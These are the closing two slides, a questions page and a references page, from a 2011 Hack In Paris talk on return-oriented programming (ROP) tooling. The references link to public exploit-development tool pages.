Page 59: Hack In Paris 2011 Skyrack ROP for masses · Hack In Paris 2011 Skyrack ROP for masses ... jmp eax jmp eax. ... Assumptions for this demo Stack grows up No ASLR

Copyright Hervé Schauer Consultants 2000-2010 - Reproduction Interdite59/60

¿ Questions ?

Thank you and happy roping !

Page 60: Hack In Paris 2011 Skyrack ROP for masses · Hack In Paris 2011 Skyrack ROP for masses ... jmp eax jmp eax. ... Assumptions for this demo Stack grows up No ASLR

Copyright Hervé Schauer Consultants 2000-2010 - Reproduction Interdite60/60

References

[1] http://www.vnsecurity.net/2010/08/ropeme-rop-exploit-made-easy/

[2] http://www.pentestit.com/2010/12/07/update-immunity-debugger-v180/

[3] http://redmine.corelan.be:8800/projects/pvefindaddr

[4] ?